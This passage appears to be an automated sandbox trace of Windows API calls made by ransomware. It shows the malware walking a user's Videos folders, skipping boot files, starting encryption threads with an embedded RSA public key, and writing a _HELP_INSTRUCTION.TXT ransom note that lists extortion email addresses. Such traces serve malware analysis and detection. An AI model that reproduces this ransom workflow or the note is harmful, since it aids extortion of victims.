HALPmcxz\\Videos\\xAriJR5aTdl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl" [0132.731] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*" [0132.731] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="Desktop") returned 0x0 [0132.731] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\", lpSrch="DESKTOP") returned 0x0 [0132.731] SetErrorMode (uMode=0x1) returned 0x1 [0132.731] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\_HELP_INSTRUCTION.TXT") returned 70 [0132.731] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0132.731] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0132.731] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x6c8) returned 0x0 [0132.731] RegQueryValueExW (in: hKey=0x6c8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3ceacc0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3ceacc0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0132.731] RegCloseKey (hKey=0x6c8) returned 0x0 [0132.731] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0132.731] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0132.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0132.731] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\xarijr5atdl\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6c8 [0132.732] WriteFile (in: hFile=0x6c8, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0132.732] CloseHandle (hObject=0x6c8) returned 1 [0132.732] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cde5d8 [0132.732] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl") returned="xAriJR5aTdl" [0132.732] lstrcpyW (in: lpString1=0x17b644, lpString2="xAriJR5aTdl" | out: lpString1="xAriJR5aTdl") returned="xAriJR5aTdl" [0132.732] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0132.733] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0132.733] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0132.733] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0132.733] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0132.733] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0132.733] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0132.733] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0132.733] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0132.733] FindClose (in: hFindFile=0x3cde5d8 | out: hFindFile=0x3cde5d8) returned 1 [0132.733] FindClose (in: hFindFile=0x3cde5d8 | out: hFindFile=0x3cde5d8) returned 0 [0132.733] FindNextFileW (in: hFindFile=0x3cde358, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0132.733] lstrcmpW (lpString1="Z-_06k", lpString2="..") returned 1 [0132.733] lstrcmpW (lpString1="Z-_06k", lpString2=".") returned 1 [0132.733] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos" [0132.733] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\" [0132.733] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\", lpString2="Z-_06k" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" [0132.733] SetErrorMode (uMode=0x1) returned 0x1 [0132.733] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" [0132.733] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0132.733] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0132.733] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*" [0132.733] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cde5d8 [0132.734] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="Z-_06k" [0132.734] lstrcpyW (in: lpString1=0x17b644, lpString2="Z-_06k" | out: lpString1="Z-_06k") returned="Z-_06k" [0132.734] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0132.734] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0132.734] lstrcmpW (lpString1="8bunT0Nrx1v M.avi", lpString2="..") returned 1 [0132.734] lstrcmpW (lpString1="8bunT0Nrx1v M.avi", lpString2=".") returned 1 [0132.734] StrStrW (lpFirst="8bunT0Nrx1v M.avi", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0132.734] StrStrW (lpFirst="8bunT0Nrx1v M.avi", lpSrch="ntldr") returned 0x0 [0132.734] StrStrW (lpFirst="8bunT0Nrx1v M.avi", lpSrch="NTLDR") returned 0x0 [0132.734] StrStrW (lpFirst="8bunT0Nrx1v M.avi", lpSrch="NTDETECT.COM") returned 0x0 [0132.734] StrStrW (lpFirst="8bunT0Nrx1v M.avi", lpSrch="ntdetect.com") returned 0x0 [0132.734] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="Desktop") returned 0x0 [0132.735] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="DESKTOP") returned 0x0 [0132.735] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned 48 [0132.735] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0132.735] lstrcpyW (in: lpString1=0x17be7c, lpString2="8bunT0Nrx1v M.avi" | out: lpString1="8bunT0Nrx1v M.avi") returned="8bunT0Nrx1v M.avi" [0132.735] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0132.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6d0 [0132.735] Sleep (dwMilliseconds=0x96) [0132.886] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0132.886] lstrcmpW (lpString1="aC_Ja4AvvNCLsQMnj7.swf", lpString2="..") returned 1 [0132.886] lstrcmpW (lpString1="aC_Ja4AvvNCLsQMnj7.swf", lpString2=".") returned 1 [0132.886] StrStrW (lpFirst="aC_Ja4AvvNCLsQMnj7.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0132.886] StrStrW (lpFirst="aC_Ja4AvvNCLsQMnj7.swf", lpSrch="ntldr") returned 0x0 [0132.886] StrStrW (lpFirst="aC_Ja4AvvNCLsQMnj7.swf", lpSrch="NTLDR") returned 0x0 [0132.886] StrStrW (lpFirst="aC_Ja4AvvNCLsQMnj7.swf", lpSrch="NTDETECT.COM") returned 0x0 [0132.886] StrStrW (lpFirst="aC_Ja4AvvNCLsQMnj7.swf", lpSrch="ntdetect.com") returned 0x0 [0132.886] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="Desktop") returned 0x0 [0132.886] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="DESKTOP") returned 0x0 [0132.886] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned 48 [0132.886] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0132.886] lstrcpyW (in: lpString1=0x17be7c, lpString2="aC_Ja4AvvNCLsQMnj7.swf" | out: lpString1="aC_Ja4AvvNCLsQMnj7.swf") returned="aC_Ja4AvvNCLsQMnj7.swf" [0132.886] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0132.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6c4 [0132.887] Sleep (dwMilliseconds=0x96) [0133.042] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0133.042] lstrcmpW (lpString1="bjQVhKZ0dfp8gRtn_Z.flv", lpString2="..") returned 1 [0133.042] lstrcmpW (lpString1="bjQVhKZ0dfp8gRtn_Z.flv", lpString2=".") returned 1 [0133.042] StrStrW (lpFirst="bjQVhKZ0dfp8gRtn_Z.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0133.042] StrStrW (lpFirst="bjQVhKZ0dfp8gRtn_Z.flv", lpSrch="ntldr") returned 0x0 [0133.042] StrStrW (lpFirst="bjQVhKZ0dfp8gRtn_Z.flv", lpSrch="NTLDR") returned 0x0 [0133.042] StrStrW (lpFirst="bjQVhKZ0dfp8gRtn_Z.flv", lpSrch="NTDETECT.COM") returned 0x0 [0133.042] StrStrW (lpFirst="bjQVhKZ0dfp8gRtn_Z.flv", lpSrch="ntdetect.com") returned 0x0 [0133.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="Desktop") returned 0x0 [0133.042] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="DESKTOP") returned 0x0 [0133.042] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned 48 [0133.042] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0133.042] lstrcpyW (in: lpString1=0x17be7c, lpString2="bjQVhKZ0dfp8gRtn_Z.flv" | out: lpString1="bjQVhKZ0dfp8gRtn_Z.flv") returned="bjQVhKZ0dfp8gRtn_Z.flv" [0133.042] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0133.042] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6e0 [0133.043] Sleep (dwMilliseconds=0x96) [0133.198] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0133.198] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0133.198] lstrcmpW (lpString1="xTAGaGiIpU.mp4", lpString2="..") returned 1 [0133.198] lstrcmpW (lpString1="xTAGaGiIpU.mp4", lpString2=".") returned 1 [0133.199] StrStrW (lpFirst="xTAGaGiIpU.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0133.199] StrStrW (lpFirst="xTAGaGiIpU.mp4", lpSrch="ntldr") returned 0x0 [0133.199] StrStrW (lpFirst="xTAGaGiIpU.mp4", lpSrch="NTLDR") returned 0x0 [0133.199] StrStrW (lpFirst="xTAGaGiIpU.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0133.199] StrStrW (lpFirst="xTAGaGiIpU.mp4", lpSrch="ntdetect.com") returned 0x0 [0133.199] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="Desktop") returned 0x0 [0133.199] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="DESKTOP") returned 0x0 [0133.199] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned 48 [0133.199] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0133.199] lstrcpyW (in: lpString1=0x17be7c, lpString2="xTAGaGiIpU.mp4" | out: lpString1="xTAGaGiIpU.mp4") returned="xTAGaGiIpU.mp4" [0133.199] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0133.199] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6d8 [0133.199] Sleep (dwMilliseconds=0x96) [0133.354] FindNextFileW (in: hFindFile=0x3cde5d8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0133.354] FindClose (in: hFindFile=0x3cde5d8 | out: hFindFile=0x3cde5d8) returned 1 [0133.354] FindClose (in: hFindFile=0x3cde5d8 | out: hFindFile=0x3cde5d8) returned 0 [0133.355] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k" [0133.355] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\*.*" [0133.355] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="Desktop") returned 0x0 [0133.355] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\", lpSrch="DESKTOP") returned 0x0 [0133.355] SetErrorMode (uMode=0x1) returned 0x1 [0133.355] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\_HELP_INSTRUCTION.TXT") returned 65 [0133.355] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0133.355] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0133.355] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x6e8) returned 0x0 [0133.356] RegQueryValueExW (in: hKey=0x6e8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3ceaef0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3ceaef0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0133.356] RegCloseKey (hKey=0x6e8) returned 0x0 [0133.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0133.356] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0133.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0133.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\z-_06k\\_help_instruction.txt"), dwDesiredAccess=0x40000000, 